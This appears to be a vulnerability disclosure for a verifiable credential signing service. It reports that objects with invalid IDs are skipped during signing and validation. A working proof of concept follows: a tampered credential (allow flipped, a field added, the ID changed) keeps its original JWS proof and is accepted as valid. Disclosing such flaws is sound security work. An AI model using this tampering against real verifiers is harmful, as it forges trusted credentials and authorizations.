Block of fields are skipped from signature when invalid ID is presented

Summary:

When there is invalid ID in an object, all the fields in it are excluded in the signing process. The same object is skipped on validation, the result of which is - some modification in this object do not affect the validity of the signature. So anyone can modify the fields and still have correctly signed verifiable presentation/credential.

Request for proof:

{
    "@context": [
        "https://www.w3.org/2018/credentials/v1",
        "https://w3id.org/security/suites/jws-2020/v1",
        "https://schema.org"
    ],
    "credentialSubject": {
        "allow": true,
        "id": "ZZZZZZZZZZ"
    },
    "issuanceDate": "2022-07-01T11:07:57.975459274Z",
    "issuer": "did:web:gaiax.vereign.com:tsa:policy:policy:example:returnDID:1.0:evaluation",
    "type": "VerifiableCredential"
}

Modified response:

{
    "@context": [
        "https://www.w3.org/2018/credentials/v1",
        "https://w3id.org/security/suites/jws-2020/v1",
        "https://schema.org"
    ],
    "credentialSubject": {
        "allow": false,
        "newField": "__additional value__",
        "id": "__modified ID__"
    },
    "issuanceDate": "2022-07-01T11:07:57.975459274Z",
    "issuer": "did:web:gaiax.vereign.com:tsa:policy:policy:example:returnDID:1.0:evaluation",
    "proof": {
        "created": "2022-07-29T11:11:30.473595161Z",
        "jws": "eyJhbGciOiJKc29uV2ViU2lnbmF0dXJlMjAyMCIsImI2NCI6ZmFsc2UsImNyaXQiOlsiYjY0Il19..MEUCIQCnULsDBVCNRH2fn_D8LG4H3kDFTqrhhIdkEafXGTylZwIgXha4OC42IbeKijP7pip05U1nFMLDH4tZowdOe0zFeTs",
        "proofPurpose": "assertionMethod",
        "type": "JsonWebSignature2020",
        "verificationMethod": "did:web:gaiax.vereign.com:tsa:policy:policy:example:returnDID:1.0:evaluation#key1"
    },
    "type": "VerifiableCredential"
}

Result:

HTTP/1.1 200 OK
date: Fri, 29 Jul 2022 08:22:14 GMT
content-type: application/json
content-length: 15
strict-transport-security: max-age=15724800; includeSubDomains
{
    "valid": true
}